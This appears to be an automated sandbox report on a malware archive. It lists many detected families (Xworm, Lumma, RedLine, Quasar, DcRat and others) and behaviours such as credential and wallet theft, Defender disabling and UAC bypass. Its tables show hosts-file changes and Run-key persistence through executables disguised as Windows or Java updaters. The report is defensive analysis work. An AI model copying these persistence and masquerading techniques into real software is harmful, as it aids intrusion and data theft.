Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Xworm
Gurcu family
44Caliber family
Lumma Stealer, LummaC
Umbral
Gurcu, WhiteSnake
Suspicious use of NtCreateUserProcessOtherParentProcess
Process spawned unexpected child process
Contains code to disable Windows Defender
Lumma family
RedLine payload
Quasar family
Snake Keylogger payload
Dcrat family
Quasar payload
Discordrat family
Discord RAT
44Caliber
Nanocore family
Xworm family
xmrig
Redline family
Stealc family
UAC bypass
Umbral family
Phorphiex family
Stealc
Detect Umbral payload
Detect Xworm Payload
Phorphiex, Phorpiex
DcRat
Xmrig family
Azorult family
Snake Keylogger
RedLine
Azorult
Snakekeylogger family
Phorphiex payload
NanoCore
Quasar RAT
Modifies WinLogon for persistence
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
DCRat payload
Creates new service(s)
Drops file in Drivers directory
Downloads MZ/PE file
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Clipboard Data
Reads data files stored by FTP clients
Identifies Wine through registry keys
Drops startup file
Reads user/profile data of web browsers
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Indicator Removal: File Deletion
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Checks whether UAC is enabled
Obfuscated Files or Information: Command Obfuscation
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
AutoIT Executable
Suspicious use of SetThreadContext
UPX packed file
Drops file in Windows directory
Drops file in Program Files directory
Launches sc.exe
Detects Pyinstaller
Program crash
System Network Configuration Discovery: Internet Connection Discovery
Access Token Manipulation: Create Process with Token
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
System Network Configuration Discovery: Wi-Fi Discovery
Unsigned PE
Browser Information Discovery
Event Triggered Execution: Installer Packages
Kills process with taskkill
Scheduled Task/Job: Scheduled Task
Suspicious behavior: SetClipboardViewer
Runs .reg file with regedit
Enumerates system info in registry
outlook_win_path
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
GoLang User-Agent
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies registry key
Suspicious use of AdjustPrivilegeToken
outlook_office_path
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Gathers system information
Uses Task Scheduler COM API
Views/modifies file attributes
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Azorult
Azorult family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
